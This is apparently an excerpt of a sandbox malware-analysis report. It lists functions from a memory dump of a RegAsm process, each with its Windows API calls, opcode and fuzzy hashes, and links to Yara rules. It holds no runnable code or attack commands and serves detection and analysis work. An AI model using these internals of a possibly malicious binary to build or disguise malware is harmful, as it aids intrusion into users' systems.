                                                                        • Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                        • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                        • Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                        • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                        Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$FilePointer
                                                                        • String ID:
                                                                        • API String ID: 1156039329-0
                                                                        • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                        • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                        • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                        • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                        Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                        • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                        • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                        • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                        Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                        • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                        • String ID:
                                                                        • API String ID: 1125800050-0
                                                                        • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                        • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                        • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                        • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                        Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleSleep
                                                                        • String ID: }A
                                                                        • API String ID: 252777609-2138825249
                                                                        • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                        • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                        • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                        • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                        Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                        • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                        • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                        • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                        Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: BINARY
                                                                        • API String ID: 2221118986-907554435
                                                                        • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                        • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                        Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • _mbscpy.MSVCRT ref: 00405250
                                                                        • _mbscat.MSVCRT ref: 0040525B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 568699880-0
                                                                        • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                        • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                        • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                        • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                        Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID: /stext
                                                                        • API String ID: 2081463915-3817206916
                                                                        • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                        • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                        Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$??2@CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 1023896661-0
                                                                        • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                        • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                        • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                        • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                        Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                        • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 2445788494-0
                                                                        • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                        • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                        Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: malloc
                                                                        • String ID: failed to allocate %u bytes of memory
                                                                        • API String ID: 2803490479-1168259600
                                                                        • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                        • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                        • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                        • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                        Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                        • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                        • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                        • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                        Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcmpmemset
                                                                        • String ID:
                                                                        • API String ID: 1065087418-0
                                                                        • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                        • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                        Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                        • CloseHandle.KERNEL32(?), ref: 00410654
                                                                          • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                        • String ID:
                                                                        • API String ID: 1381354015-0
                                                                        • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                        • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                        Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID:
                                                                        • API String ID: 2221118986-0
                                                                        • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                        • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                        • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                        • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                        Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                        • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                        • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                        • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                        Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                        • String ID:
                                                                        • API String ID: 2154303073-0
                                                                        • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                        • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                        Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$PointerRead
                                                                        • String ID:
                                                                        • API String ID: 3154509469-0
                                                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                        Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                        • String ID:
                                                                        • API String ID: 4232544981-0
                                                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                        Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                        Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName
                                                                        • String ID:
                                                                        • API String ID: 514040917-0
                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                        • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                        • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                        Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                        • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                        • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                        • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                        Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                        • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                        • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                        • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                        Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                        Memory Dump Source
